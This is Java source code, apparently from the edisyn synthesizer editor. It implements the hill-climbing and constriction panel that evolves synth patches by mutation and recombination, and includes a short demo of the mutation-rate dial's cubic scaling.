keys, mutationWeight); // B - Z currentModels[stage + 9] = b.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); currentModels[stage + 10] = b.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // (A - Z) + (B - Z) currentModels[stage + 11] = a.copy().opposite(random, oldA, keys, recombination, false).recombine(random, b.copy().opposite(random, oldA, keys, recombination, false), keys, recombination).mutate(random, keys, mutationWeight); // A currentModels[stage + 12] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 13] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B currentModels[stage + 14] = b.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 15] = b.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); } } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model oldA) { int numStages = NUM_CANDIDATES / STAGE_SIZE; for(int i = 0; i < numStages; i++) { produce(random, keys, recombination, weight, a, oldA, i * STAGE_SIZE); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model oldA, int stage) { double mutationWeight = (stage/STAGE_SIZE + 1) * MUTATION_WEIGHT * weight; // A currentModels[stage + 0] = a.copy().mutate(random, keys, mutationWeight); currentModels[stage + 1] = a.copy().mutate(random, keys, mutationWeight); currentModels[stage + 2] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 3] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 4] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 5] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 6] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 7] = a.copy().mutate(random, keys, 
mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); if ((stage + 8) < currentModels.length) { currentModels[stage + 8] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 9] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 10] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 11] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 12] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - Z currentModels[stage + 13] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); currentModels[stage + 14] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 15] = a.copy().opposite(random, oldA, keys, recombination, false).opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); } } void constrict() { int poolSize= (bigger.isSelected() ? NUM_CANDIDATES : STAGE_SIZE); // that is, 32 vs 16 Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("constrictrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end // Identify the individuals to replace and the ones to keep int numToReplace = 0; for(int i = 0; i < selected.length; i++) { if (!selected[i].isSelected()) numToReplace++; } int[] replace = new int[numToReplace]; int[] keep = new int[poolSize - numToReplace]; if (replace.length == 0 || keep.length == 0) return; int k = 0; int r = 0; for(int i = 0; i < poolSize; i++) { if (selected[i].isSelected()) keep[k++] = i; else replace[r++] = i; } pushStack(new int[] { -1, -1, -1 }, new Model[] { currentModels[NUM_CANDIDATES - 1], null, null }, getSelectedResults(), currentModels); operation = OPERATION_CONSTRICT; // Now replace the individuals for(int i = 0; i < replace.length; i++) { // pick two parents, try to make them different from one another int p1 = random.nextInt(keep.length); int p2 = 0; for(int j = 0; j < 100; j++) { p2 = random.nextInt(keep.length); if (p2 != p1) break; } if (method.getSelectedIndex() == 1) { // our recombination works as follows: 50% of the time we'll do crossover with a 1/2 rate. Otherwise we'll do it with a 3/4 rate. 
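/* Concretely: CONSTRICT_RECOMBINATION_RATE is 0.75, so each replaced candidate is rebuilt by recombining two (preferably distinct) kept parents at a rate of either 0.5 or 0.75, chosen by coin flip, and then mutating it with the cubed constrict-rate dial weight computed above. */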
double rate = CONSTRICT_RECOMBINATION_RATE; // recombine if (random.nextBoolean()) rate = 0.5; currentModels[replace[i]] = currentModels[keep[p1]].copy().recombine(random, currentModels[keep[p2]], keys, rate).mutate(random, keys, weight); } } // Move the new ones to the beginning Model[] old = (Model[])(currentModels.clone()); int count = 0; for(int i = 0; i < replace.length; i++) { currentModels[count++] = old[replace[i]]; } for(int i = 0; i < keep.length; i++) { currentModels[count++] = old[keep[i]]; } iterations.setName("Iteration " + stack.size()); repaint(); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int i = 0; i < NUM_CANDIDATES; i++) selected[i].setSelected(true); } void climb() { Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end currentModels[NUM_MODELS - 1] = synth.getModel(); // What were the best models before? int[] bestModels = new int[3]; for(int j = 0; j < 3; j++) bestModels[j] = -1; // load the best models for(int i = 0; i < NUM_MODELS; i++) { for(int j = 0; j < 3; j++) { if (ratings[i][j].isSelected()) bestModels[j] = i; } } // Compact if (bestModels[1] == -1) { bestModels[1] = bestModels[2]; bestModels[2] = -1; } if (bestModels[0] == -1) { bestModels[0] = bestModels[1]; bestModels[1] = bestModels[2]; bestModels[2] = -1; } Model oldA = topStack().parents[0]; if (bestModels[0] == -1) { again(); // nothing was selected as good, so we just do a retry } else if (bestModels[1] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], null, null }, getSelectedResults(), currentModels); produce(random, keys, CLIMB_RECOMBINATION_RATE, weight, currentModels[bestModels[0]], oldA); operation = OPERATION_CLIMB; } else if (bestModels[2] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], null }, getSelectedResults(), currentModels); produce(random, keys, CLIMB_RECOMBINATION_RATE, weight, currentModels[bestModels[0]], currentModels[bestModels[1]], oldA); operation = OPERATION_CLIMB; } else { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]] }, getSelectedResults(), currentModels); produce(random, keys, CLIMB_RECOMBINATION_RATE, weight, currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]], oldA); operation = OPERATION_CLIMB; } iterations.setName("Iteration " + stack.size()); repaint(); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int i = 0; i < NUM_CANDIDATES; i++) selected[i].setSelected(true); } void climbNN() { Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end currentModels[NUM_MODELS - 1] = synth.getModel(); // What were the best models before? 
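/* bestModels[0..2] will hold the indices of whichever models are currently rated 1 (best), 2, and 3 via the ratings radio buttons, or -1 where no such rating exists; the compaction below then shifts any -1 entries to the end before breeding. */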
int[] bestModels = new int[3]; for(int j = 0; j < 3; j++) bestModels[j] = -1; // load the best models for(int i = 0; i < NUM_MODELS; i++) { for(int j = 0; j < 3; j++) { if (ratings[i][j].isSelected()) bestModels[j] = i; } } // Compact if (bestModels[1] == -1) { bestModels[1] = bestModels[2]; bestModels[2] = -1; } if (bestModels[0] == -1) { bestModels[0] = bestModels[1]; bestModels[1] = bestModels[2]; bestModels[2] = -1; } if (bestModels[0] == -1) { again(); // nothing was selected as good, so we just do a retry } else if (bestModels[1] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], null, null }, getSelectedResults(), currentModels); produceNN(random, keys, weight, currentModels[bestModels[0]]); operation = OPERATION_CLIMB_NN; } else if (bestModels[2] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], null }, getSelectedResults(), currentModels); produceNN(random, keys, weight, currentModels[bestModels[0]], currentModels[bestModels[1]]); operation = OPERATION_CLIMB_NN; } else { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]] }, getSelectedResults(), currentModels); produceNN(random, keys, weight, currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]]); operation = OPERATION_CLIMB_NN; } iterations.setName("Iteration " + stack.size()); repaint(); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int i = 0; i < NUM_CANDIDATES; i++) selected[i].setSelected(true); } }
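The mutation-rate dials above are intentionally non-linear: climb(), climbNN() and constrict() all divide the 0-100 dial value by 100 and cube it before using it as the mutation weight ("make more sensitive at low end", per the comments in those methods), and the dial's map() displays that cubed value scaled back up by 100, which is why the default setting of 37 is noted as "roughly 5 when we do weight^3". Below is a minimal standalone sketch of just that mapping; the class and method names are illustrative only and do not exist in edisyn.

class MutationRateDialDemo {
    // Mirrors the weight = weight * weight * weight computation used in
    // climb(), climbNN() and constrict() above.
    static double dialToWeight(int dial) {
        double w = dial / 100.0;
        return w * w * w;
    }

    public static void main(String[] args) {
        int[] settings = { 0, 37, 50, 100 };    // 37 == INITIAL_HILL_CLIMB_RATE
        for (int s : settings) {
            // LabelledDial.map() in HillClimb shows the cubed value scaled back up by 100.
            System.out.printf("dial=%3d  mutation weight=%.5f  displayed=%.3f%n",
                s, dialToWeight(s), dialToWeight(s) * 100.0);
        }
    }
}

Running this prints a weight of about 0.05065 for the default dial setting of 37, so candidate generation starts out with quite gentle mutation and only approaches full-strength mutation as the dial nears 100.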
edisyn/HillClimb.java
/*** Copyright 2017 by Sean Luke Licensed under the Apache License version 2.0 */ package edisyn; import edisyn.synth.*; import edisyn.nn.*; import edisyn.gui.*; import javax.swing.*; import javax.swing.event.*; import javax.swing.border.*; import java.awt.*; import java.awt.event.*; import java.util.*; import java.io.*; /*** Procedure: Menu -> Start Hill-Climb [or Menu -> Reset Hill-Climb if already started] Creates Hill-Climb Panel and Resets it to current patch Menu -> Stop Hill-Climb Deletes Hill-Climb Panel Each sound has: 1. Done (or Keep?) -> Deletes Hill-Climb Panel and sets current patch to this sound [probably requires double-check dialog panel] 2. Try -> Sends sound to current patch 3. Best / Second Best / Third Best The Panel also has: 1. Iterate 2. Rate 3. Backup Hill-Climbing variations ***/ public class HillClimb extends SynthPanel { // OPERATIONS public static final int OPERATION_SEED_FROM_PATCH = 0; public static final int OPERATION_SEED_FROM_MORPH = 1; public static final int OPERATION_SEED_FROM_NUDGE = 2; public static final int OPERATION_SEED_FROM_FOUR = 3; public static final int OPERATION_SEED_FROM_SIX = 4; public static final int OPERATION_SEED_FROM_LIBRARIAN = 100; public static final int OPERATION_CLIMB = 4; public static final int OPERATION_CONSTRICT = 5; public static final int OPERATION_CLIMB_NN = 6; // HILL CLIMBING AND CONSTRICTION RATES // Note that the mutation rates go 0...100 inclusive, ints public static final int INITIAL_HILL_CLIMB_RATE = 37; // roughly 5 when we do weight^3 public static final int INITIAL_CONSTRICT_RATE = 0; // Note that the recombination rates go 0.0...1.0 inclusive, doubles public static final double CLIMB_RECOMBINATION_RATE = 0.75; public static final double CONSTRICT_RECOMBINATION_RATE = 0.75; /// HILL CLIMBING STACK class State { Model[] parents; int[] parentIndices; boolean[] parentsSelected; Model[] children; int operation; } // The stack proper ArrayList stack = new ArrayList(); /// NUMBER OF CANDIDATE SOLUTIONS public static final int NUM_CANDIDATES = 32; /// Candidates are divided into STAGES of 16 each. The mutation/recombionation procedures use the stage to determine how much mutation to do public static final int STAGE_SIZE = 16; // Size of the archive. We might make this bigger later. public static final int ARCHIVE_SIZE = 6; // There are more models than candidates: #17 is the current Model public static final int NUM_MODELS = NUM_CANDIDATES + ARCHIVE_SIZE + 1; // models currently being played and displayed Model[] currentModels = new Model[NUM_MODELS]; // the most recent procedure performed (see OPERATIONS above) int operation; // The ratings buttons, in the form ratings[candidate][rating] JRadioButton[][] ratings = new JRadioButton[NUM_MODELS + 1][3]; // The selection checkboxes, in the form selected[candidate]. Note that the only candidates are the actual candidates, not archives etc. JCheckBox[] selected = new JCheckBox[NUM_CANDIDATES]; // The play buttons, in the form plays[candidate] PushButton[] plays = new PushButton[NUM_MODELS]; // An empty synth used to store the hillclimbing and constriction model parameters, // since they can't be stored in the regular synth. Blank blank; // "Iteration 123" Category iterations; // Which sound is currently scheduled to be playing in the regular iteration int currentPlay = 0; // Which sound, if any, is currently playing because the user interrupted the regular iteration by pressing the sound's play button. 
// If no such sound, this is -1 int temporaryPlay = -1; // Climb button PushButton climb; // Constrict button. Notice that this is different from Climb PushButton constrict; // Climb mutation weights LabelledDial hillClimbRate; // Constriction mutation weights. Notice that this is different from Climb LabelledDial constrictRate; // Retry button PushButton retry; // Reset button PushButton reset; // Back button PushButton back; // Bigger checkbox JCheckBox bigger; // Box holding the hillcimber button and dial VBox hillClimbBox; // Box holding the constrictor button and dial VBox constrictBox; // Box holding either the hillClimbBox or the constrictBox. Needs to be occasionally revalidated. VBox outerBox; // List of climbing methods JComboBox method; // First 16 candidates VBox extraCandidates1; // Next 16 candidates VBox extraCandidates2; // holds either extraCandidates1 or extraCandidates1 + extraCandidates2 VBox candidates; boolean startSoundsAgain = false; public static final int NO_MENU_BUTTON = -1; int menuButton = NO_MENU_BUTTON; public void setToCurrentPatch() { if (menuButton != NO_MENU_BUTTON) { currentModels[menuButton] = synth.getModel().copy(); currentPlay = menuButton; menuButton = NO_MENU_BUTTON; if (startSoundsAgain) { synth.doSendTestNotes(); startSoundsAgain = false; } } } State popStack() { if (stack.size() == 0) return null; else return (State)(stack.remove(stack.size() - 1)); } void pushStack(int[] parentIndices, Model[] parents, boolean[] parentsSelected, Model[] children) { State state = new State(); state.parents = new Model[parents.length]; state.parentIndices = new int[parents.length]; state.parentsSelected = new boolean[parentsSelected.length]; state.operation = operation; for(int i = 0; i < parents.length; i++) { state.parents[i] = copy(parents[i]); state.parentIndices[i] = parentIndices[i]; state.parentsSelected[i] = parentsSelected[i]; } for(int i = 0; i < parentsSelected.length; i++) { state.parentsSelected[i] = parentsSelected[i]; } state.children = new Model[children.length]; for(int i = 0; i < children.length; i++) { state.children[i] = copy(children[i]); } stack.add(state); } State topStack() { if (stack.size() == 0) return null; else return (State)(stack.get(stack.size() - 1)); } boolean stackEmpty() { return (stack.size() == 0); } boolean stackInitial() { return (stack.size() == 1); } String titleForButton(int _i) { return "Play " + (_i < 16 ? (char)('a' + _i) : (_i < NUM_CANDIDATES ? (char)('A' + (_i - 16)) : (_i < NUM_MODELS - 1 ? (char)('q' + (_i - NUM_CANDIDATES)) : 'z'))); } VBox buildCandidate(int i) { final int _i = i; VBox vbox = new VBox(); plays[_i] = new PushButton(titleForButton(i)) { public void perform() { if (synth.isSendingTestNotes()) { temporaryPlay = _i; } else { for(int j = 0; j < NUM_MODELS; j++) { plays[j].getButton().setForeground(new JButton().getForeground()); plays[j].getButton().setText(titleForButton(j)); } plays[_i].getButton().setForeground(Color.RED); plays[_i].getButton().setText("<HTML><B>" + titleForButton(_i) + "</b></HTML>"); // change the model, send all parameters, maybe play a note, // and then restore the model. 
Model backup = synth.model; synth.model = currentModels[_i]; synth.sendAllParameters(); synth.doSendTestNote(); synth.model = backup; temporaryPlay = _i; } } }; plays[i].getButton().setFocusable(false); vbox.add(plays[i]); HBox hh = new HBox(); VBox vv = new VBox(); Box b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[i][0] = new JRadioButton("1")); ratings[i][0].setFocusable(false); ratings[i][0].setForeground(Style.TEXT_COLOR()); ratings[i][0].setFont(Style.SMALL_FONT()); ratings[i][0].putClientProperty("JComponent.sizeVariant", "small"); ratings[i][0].setOpaque(false); // for windows vv.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[i][1] = new JRadioButton("2")); ratings[i][1].setFocusable(false); ratings[i][1].setForeground(Style.TEXT_COLOR()); ratings[i][1].setFont(Style.SMALL_FONT()); ratings[i][1].putClientProperty("JComponent.sizeVariant", "small"); ratings[i][1].setOpaque(false); // for windows b.add(Box.createGlue()); vv.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[i][2] = new JRadioButton("3")); ratings[i][2].setFocusable(false); ratings[i][2].setForeground(Style.TEXT_COLOR()); ratings[i][2].setFont(Style.SMALL_FONT()); ratings[i][2].putClientProperty("JComponent.sizeVariant", "small"); ratings[i][2].setOpaque(false); // for windows b.add(Box.createGlue()); vv.add(b); hh.add(vv); vv = new VBox(); if (i < NUM_CANDIDATES) { selected[i] = new JCheckBox(""); selected[i].setFocusable(false); selected[i].setForeground(Style.TEXT_COLOR()); selected[i].setOpaque(false); // for windows selected[i].setFont(Style.SMALL_FONT()); selected[i].setSelected(true); selected[i].putClientProperty("JComponent.sizeVariant", "small"); vv.add(selected[i]); } hh.add(vv); vbox.add(hh); JMenuItem[] doItems = new JMenuItem[17]; doItems[0] = new JMenuItem("Keep Patch"); doItems[0].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { // Keep for sure? //if (synth.showSimpleConfirm("Keep Patch", "Load Patch into Editor?")) { synth.tabs.setSelectedIndex(0); synth.setSendMIDI(false); // push to undo if they're not the same if (!currentModels[_i].keyEquals(synth.getModel())) synth.undo.push(synth.getModel()); // Load into the current model currentModels[_i].copyValuesTo(synth.getModel()); synth.setSendMIDI(true); synth.sendAllParameters(); } } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[0].setEnabled(false); doItems[1] = new JMenuItem("Edit in New Editor"); doItems[1].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Synth newSynth = synth.doDuplicateSynth(); // Copy the parameters forward into the synth, then // link the synth's model back to currentModels[_i]. // We do this because the new synth's widgets are registered // with its model, so we can't just replace the model. // But we can certainly replace currentModels[_i]! newSynth.setSendMIDI(false); currentModels[_i].copyValuesTo(newSynth.getModel()); newSynth.setSendMIDI(true); currentModels[_i] = newSynth.getModel(); newSynth.sendAllParameters(); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[1].setEnabled(false); doItems[2] = new JMenuItem("Save to File"); doItems[2].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Model backup = synth.model; synth.model = currentModels[_i]; synth.doSaveAs("" + stack.size() + "." 
+ (_i < NUM_CANDIDATES ? (_i + 1) : ("A" + (_i - NUM_CANDIDATES + 1))) + "." + synth.getPatchName(synth.getModel()) + ".syx"); synth.model = backup; synth.updateTitle(); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[2].setEnabled(false); doItems[3] = null; doItems[4] = new JMenuItem("Request Current Patch"); doItems[4].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { if (synth.receiveCurrent.isEnabled()) { menuButton = _i; startSoundsAgain = false; // we do this because some synths send data in chunks and in-between those // chunks we may send current patch and play it, messing up the chunk (such as on the JV-880) if (synth.isSendingTestNotes()) { synth.doSendTestNotes(); startSoundsAgain = true; } synth.doRequestCurrentPatch(); // Notice we do NOT do updateAgain(); but we'll do it when the patch comes in } else { synth.showSimpleError("Cannot Request Current Patch", "This synthesizer does not support requesting the current patch (sorry)."); } } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[4].setEnabled(false); doItems[5] = new JMenuItem("Request Patch..."); doItems[5].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { if (synth.receivePatch.isEnabled()) { menuButton = _i; startSoundsAgain = false; // we do this because some synths send data in chunks and in-between those // chunks we may send current patch and play it, messing up the chunk (such as on the JV-880) if (synth.isSendingTestNotes()) { synth.doSendTestNotes(); startSoundsAgain = true; } synth.doRequestPatch(); // Notice we do NOT do updateAgain(); but we'll do it when the patch comes in } else { synth.showSimpleError("Cannot Request Patch", "This synthesizer does not support requesting a patch (sorry)."); } } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[5].setEnabled(false); doItems[6] = new JMenuItem("Load from File..."); doItems[6].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Model backup = synth.model; synth.model = currentModels[_i]; synth.setShowingLimitedBankSysex(true); synth.doOpen(false); synth.setShowingLimitedBankSysex(false); currentModels[_i] = synth.model; synth.model = backup; synth.updateTitle(); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[6].setEnabled(false); doItems[7] = new JMenuItem("Copy from Morph"); doItems[7].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { synth.setSendMIDI(false); synth.morph.current.copyValuesTo(currentModels[_i]); synth.setSendMIDI(true); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[7].setEnabled(false); doItems[8] = null; doItems[9] = new JMenuItem("Nudge Candidates to Me"); doItems[9].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Random random = synth.random; String[] keys = synth.getMutationKeys(); for(int i = 0; i < NUM_CANDIDATES; i++) { if (i == _i) continue; currentModels[i].recombine(random, currentModels[_i], keys, synth.nudgeRecombinationWeight).mutate(random, keys, synth.nudgeMutationWeight); } } }); doItems[10] = null; doItems[11] = new JMenuItem("Archive to q"); doItems[11].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 0] = (Model)(currentModels[_i].clone()); } }); doItems[12] = new JMenuItem("Archive to r"); doItems[12].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 1] = 
(Model)(currentModels[_i].clone()); } }); doItems[13] = new JMenuItem("Archive to s"); doItems[13].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 2] = (Model)(currentModels[_i].clone()); } }); doItems[14] = new JMenuItem("Archive to t"); doItems[14].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 3] = (Model)(currentModels[_i].clone()); } }); doItems[15] = new JMenuItem("Archive to u"); doItems[15].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 4] = (Model)(currentModels[_i].clone()); } }); doItems[16] = new JMenuItem("Archive to v"); doItems[16].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 5] = (Model)(currentModels[_i].clone()); } }); PushButton options = new PushButton("Options", doItems); options.getButton().setFocusable(false); vbox.add(options); return vbox; } public HillClimb(final Synth synth) { super(synth); method = new JComboBox(synth instanceof ProvidesNN ? new String[] { "Hill-Climber", "Constrictor", "NN Hill-Climber" } : new String[] { "Hill-Climber", "Constrictor" }); blank = new Blank(); addAncestorListener ( new AncestorListener () { public void ancestorAdded ( AncestorEvent event ) { requestFocusInWindow(); } public void ancestorRemoved ( AncestorEvent event ) { // will get removed } public void ancestorMoved ( AncestorEvent event ) { // don't care } } ); setFocusable(true); addKeyListener(new KeyListener() { public void keyPressed(KeyEvent e) { } public void keyReleased(KeyEvent e) { } public void keyTyped(KeyEvent e) { char c = e.getKeyChar(); if (c >= 'a' && c <= 'p') { int p = (int)(c - 'a'); plays[p].perform(); } else if (c >= 'A' && c <= 'P' && NUM_CANDIDATES == 32) { int p = (int)(c - 'A' + 16); plays[p].perform(); } else if ((c >= 'q' && c <= 'v')) { int p = (int)(c - 'q' + NUM_CANDIDATES); plays[p].perform(); } else if (c =='z') { int p = (int)(NUM_MODELS - 1); plays[p].perform(); } else if (c == ' ') { climb.perform(); } else if (c == KeyEvent.VK_BACK_SPACE) { back.perform(); } else if (c == KeyEvent.VK_ENTER) { retry.perform(); } else if (c >= '1' && c <= '3') { ratings[lastPlayedSound()][(int)(c - '1')].setSelected(true); } } }); ButtonGroup one = new ButtonGroup(); ButtonGroup two = new ButtonGroup(); ButtonGroup three = new ButtonGroup(); VBox top = new VBox(); HBox toprow = new HBox(); add(top, BorderLayout.CENTER); // add globals Category panel = new Category(null, "Iteration 1", Style.COLOR_GLOBAL()); iterations = panel; HBox iterationsBox = new HBox(); VBox vbox = new VBox(); // has to be first so others can have their size based on it back = new PushButton("Back Up") { public void perform() { pop(); resetCurrentPlay(); } }; back.getButton().setFocusable(false); outerBox = new VBox(); iterationsBox.add(outerBox); hillClimbBox = new VBox(); climb = new PushButton("Climb") { public void perform() { if (method.getSelectedIndex() == 2) // NN Climb { climbNN(); } else { climb(); } resetCurrentPlay(); } }; climb.getButton().setPreferredSize(back.getButton().getPreferredSize()); climb.getButton().setFocusable(false); hillClimbBox.add(climb); String s = synth.getLastX("HillClimbRate", synth.getClass().getName()); hillClimbRate = new LabelledDial("Mutation Rate", blank, "hillclimbrate", Style.COLOR_GLOBAL(), 0, 100) { public String map(int val) { double v = ((val / 100.0) * (val / 
100.0) * (val / 100.0)) * 100; if (v == 100) return "100.0"; else if (v >= 10.0) return String.format("%.2f", v); else return String.format("%.3f", v); } public void update(String key, Model model) { super.update(key, model); synth.setLastX("" + model.get(key), "HillClimbRate", synth.getClass().getName()); } }; int v = INITIAL_HILL_CLIMB_RATE; if (s != null) try { v = Integer.parseInt(s); } catch (Exception e) { Synth.handleException(e); } if (v < 0 || v > 100) v = INITIAL_HILL_CLIMB_RATE; hillClimbRate.setState(v); blank.getModel().set("hillclimbrate", v); hillClimbBox.add(hillClimbRate); constrictBox = new VBox(); constrict = new PushButton("Constrict") { public void perform() { constrict(); resetCurrentPlay(); } }; constrict.getButton().setPreferredSize(back.getButton().getPreferredSize()); constrict.getButton().setFocusable(false); constrictBox.add(constrict); s = synth.getLastX("ConstrictRate", synth.getClass().getName()); // we don't do this one anyway constrictRate = new LabelledDial("Mutation Rate", blank, "constrictrate", Style.COLOR_GLOBAL(), 0, 100) { public String map(int val) { double v = ((val / 100.0) * (val / 100.0) * (val / 100.0)) * 100; if (v == 100) return "100.0"; else if (v >= 10.0) return String.format("%.2f", v); else return String.format("%.3f", v); } public void update(String key, Model model) { super.update(key, model); synth.setLastX("" + model.get(key), "ConstrictRate", synth.getClass().getName()); } }; v = INITIAL_CONSTRICT_RATE; if (s != null) try { v = Integer.parseInt(s); } catch (Exception e) { Synth.handleException(e); } if (v < 0 || v > 100) v = INITIAL_CONSTRICT_RATE; constrictRate.setState(v); blank.getModel().set("constrictrate", v); constrictBox.add(constrictRate); vbox = new VBox(); retry = new PushButton("Retry") { public void perform() { again(); resetCurrentPlay(); } }; retry.getButton().setPreferredSize(back.getButton().getPreferredSize()); retry.getButton().setFocusable(false); vbox.add(retry); // add the aforementioned Back up button vbox.add(back); reset = new PushButton("Reset...", new String[] { "From Original Patch", "From Morph", "From Nudge Targets", "From First Four Candidates", "From First Six Candidates" }) { public void perform(int val) { if (method.getSelectedIndex() == 2) // NN Climb { Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end Model model = (val == OPERATION_SEED_FROM_PATCH ? synth.getModel() : val == OPERATION_SEED_FROM_MORPH ? synth.morph.current : null); produceNN(random, keys, weight, model); } else { initialize(val == OPERATION_SEED_FROM_PATCH ? synth.getModel() : val == OPERATION_SEED_FROM_MORPH ? 
synth.morph.current : null, val); } resetCurrentPlay(); } }; reset.getButton().setPreferredSize(back.getButton().getPreferredSize()); reset.getButton().setFocusable(false); vbox.add(reset); iterationsBox.add(vbox); panel.add(iterationsBox, BorderLayout.CENTER); s = synth.getLastX("HillClimbMethod", synth.getClass().getName()); method.setFont(Style.SMALL_FONT()); method.putClientProperty("JComponent.sizeVariant", "small"); method.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { int m = method.getSelectedIndex(); synth.setLastX("" + m, "HillClimbMethod", synth.getClass().getName()); setMethod(m); } }); v = 0; if (s != null) try { v = Integer.parseInt(s); } catch (Exception e) { Synth.handleException(e); } if (v < 0 || v > 2) v = 0; // clear NN if (v == 2 && !(synth instanceof ProvidesNN)) v = 1; if (v == 0 || v == 2) { outerBox.add(hillClimbBox); } else { outerBox.add(constrictBox); } method.setSelectedIndex(v); JLabel methodLabel = new JLabel("Method: "); methodLabel.setForeground(Style.TEXT_COLOR()); methodLabel.setFont(Style.SMALL_FONT()); methodLabel.putClientProperty("JComponent.sizeVariant", "small"); methodLabel.setOpaque(false); // for windows HBox eb = new HBox(); eb.add(methodLabel); eb.add(method); // we do addLast rather than add to overcome the stupid OS X "Smoo..." bug. bigger = new JCheckBox("Big"); bigger.setFocusable(false); bigger.setOpaque(false); // for windows bigger.setForeground(Style.TEXT_COLOR()); bigger.setFont(Style.SMALL_FONT()); bigger.putClientProperty("JComponent.sizeVariant", "small"); s = synth.getLastX("HillClimbBigger", synth.getClass().getName()); 